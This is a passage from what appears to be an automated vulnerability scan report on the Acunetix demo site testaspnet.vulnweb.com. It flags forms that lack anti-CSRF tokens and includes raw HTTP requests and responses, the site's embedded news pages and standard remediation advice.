href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        12. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          No anti-CSRF tokens were found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur, or that provides constructs that make it easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        13. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
